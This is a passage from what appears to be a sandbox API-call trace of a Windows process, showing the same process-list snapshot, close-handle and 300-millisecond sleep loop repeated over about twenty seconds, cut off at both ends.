cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0114.797] CloseHandle (hObject=0xc4) returned 1 [0114.797] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0114.802] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.059] CloseHandle (hObject=0xbc) returned 1 [0115.059] Sleep (dwMilliseconds=0x12c) [0115.411] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0115.417] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.539] CloseHandle (hObject=0xc4) returned 1 [0115.539] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0115.545] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.646] CloseHandle (hObject=0xbc) returned 1 [0115.647] Sleep (dwMilliseconds=0x12c) [0116.120] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0116.124] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.273] CloseHandle (hObject=0xc4) returned 1 [0116.273] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0116.279] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.333] CloseHandle (hObject=0xbc) returned 1 [0116.333] Sleep (dwMilliseconds=0x12c) [0116.734] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0116.740] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, 
szExeFile="[System Process]")) returned 1 [0116.855] CloseHandle (hObject=0xc4) returned 1 [0116.855] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0116.861] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.932] CloseHandle (hObject=0xbc) returned 1 [0116.932] Sleep (dwMilliseconds=0x12c) [0117.260] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0117.264] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.360] CloseHandle (hObject=0xc4) returned 1 [0117.360] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0117.366] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.517] CloseHandle (hObject=0xbc) returned 1 [0117.518] Sleep (dwMilliseconds=0x12c) [0118.068] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0118.074] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.329] CloseHandle (hObject=0xc4) returned 1 [0118.329] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0118.477] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.621] CloseHandle (hObject=0xbc) returned 1 [0118.621] Sleep (dwMilliseconds=0x12c) [0119.093] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0119.100] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.192] CloseHandle (hObject=0xc4) returned 1 [0119.192] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0119.208] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.281] CloseHandle (hObject=0xbc) returned 1 [0119.281] Sleep (dwMilliseconds=0x12c) [0119.642] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0119.649] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.744] CloseHandle (hObject=0xc4) returned 1 [0119.744] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0119.751] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.812] CloseHandle 
(hObject=0xbc) returned 1 [0119.812] Sleep (dwMilliseconds=0x12c) [0120.141] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0120.147] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.865] CloseHandle (hObject=0xc4) returned 1 [0120.865] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0120.871] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.296] CloseHandle (hObject=0xbc) returned 1 [0121.296] Sleep (dwMilliseconds=0x12c) [0124.828] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0124.833] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.112] CloseHandle (hObject=0xc4) returned 1 [0125.112] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0125.117] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.711] CloseHandle (hObject=0xbc) returned 1 [0125.712] Sleep (dwMilliseconds=0x12c) [0126.726] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0126.732] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.825] CloseHandle (hObject=0xc4) returned 1 [0126.825] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0126.831] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.990] CloseHandle (hObject=0xbc) returned 1 [0126.990] Sleep (dwMilliseconds=0x12c) [0127.331] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0127.336] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.454] CloseHandle (hObject=0xc4) returned 1 [0127.454] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0127.460] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.541] CloseHandle (hObject=0xbc) returned 1 [0127.541] Sleep (dwMilliseconds=0x12c) [0127.941] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0127.946] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.070] CloseHandle (hObject=0xc4) returned 1 [0128.070] 
CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0128.075] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.202] CloseHandle (hObject=0xbc) returned 1 [0128.202] Sleep (dwMilliseconds=0x12c) [0128.518] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0128.524] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.622] CloseHandle (hObject=0xc4) returned 1 [0128.622] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0128.627] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.717] CloseHandle (hObject=0xbc) returned 1 [0128.717] Sleep (dwMilliseconds=0x12c) [0129.034] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0129.040] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.133] CloseHandle (hObject=0xc4) returned 1 [0129.133] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0129.137] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.254] CloseHandle (hObject=0xbc) returned 1 [0129.254] Sleep (dwMilliseconds=0x12c) [0129.581] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0129.586] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.708] CloseHandle (hObject=0xc4) returned 1 [0129.708] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0129.713] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.800] CloseHandle (hObject=0xbc) returned 1 [0129.800] Sleep (dwMilliseconds=0x12c) [0130.120] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0130.125] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.211] CloseHandle (hObject=0xc4) returned 1 [0130.211] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0130.215] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.332] CloseHandle (hObject=0xbc) returned 1 [0130.332] Sleep (dwMilliseconds=0x12c) [0130.740] CreateToolhelp32Snapshot 
(dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0130.745] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.848] CloseHandle (hObject=0xc4) returned 1 [0130.848] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0130.854] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.983] CloseHandle (hObject=0xbc) returned 1 [0130.983] Sleep (dwMilliseconds=0x12c) [0131.328] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0131.334] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.453] CloseHandle (hObject=0xc4) returned 1 [0131.453] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0131.459] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.563] CloseHandle (hObject=0xbc) returned 1 [0131.563] Sleep (dwMilliseconds=0x12c) [0131.962] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0131.967] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.141] CloseHandle (hObject=0xc4) returned 1 [0132.141] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0132.146] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.283] CloseHandle (hObject=0xbc) returned 1 [0132.283] Sleep (dwMilliseconds=0x12c) [0132.692] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0132.697] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.800] CloseHandle (hObject=0xc4) returned 1 [0132.800] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0132.805] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.927] CloseHandle (hObject=0xbc) returned 1 [0132.927] Sleep (dwMilliseconds=0x12c) [0133.348] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0133.353] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.473] CloseHandle (hObject=0xc4) returned 1 [0133.473] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0133.478] 
Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.609] CloseHandle (hObject=0xbc) returned 1 [0133.610] Sleep (dwMilliseconds=0x12c) [0133.935] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0133.941] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.054] CloseHandle (hObject=0xc4) returned 1 [0134.054] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0134.060] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.176] CloseHandle (hObject=0xbc) returned 1 [0134.176] Sleep (dwMilliseconds=0x12c) [0134.485] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0134.490] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.527] CloseHandle (hObject=0xc4) returned 1 [0134.527] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0134.626] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, 
szExeFile="[System Process]")) returned 1 [0134.664] CloseHandle (hObject=0xbc) returned 1 [0134.664] Sleep (dwMilliseconds=0x12c) [0135.001] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0135.006] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.066] CloseHandle (hObject=0xc4) returned 1 [0135.066] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0135.071] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.208] CloseHandle (hObject=0xbc) returned 1 [0135.208] Sleep (dwMilliseconds=0x12c) [0135.546] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0135.551] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.600] CloseHandle (hObject=0xc4) returned 1 [0135.600] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0135.608] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.656] CloseHandle (hObject=0xbc) returned 1 [0135.656] Sleep (dwMilliseconds=0x12c) [0136.024] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0136.030] Process32FirstW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.095] CloseHandle (hObject=0xc4) returned 1 [0136.095] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0136.101] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.700] CloseHandle (hObject=0xbc) returned 1 [0136.700] Sleep (dwMilliseconds=0x12c) [0137.084] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0137.089] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.175] CloseHandle (hObject=0xc4) returned 1 [0137.175] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0137.181] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.350] CloseHandle (hObject=0xbc) returned 1 [0137.351] Sleep (dwMilliseconds=0x12c) [0137.670] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0137.675] Process32FirstW (in: hSnapshot=0xc4, 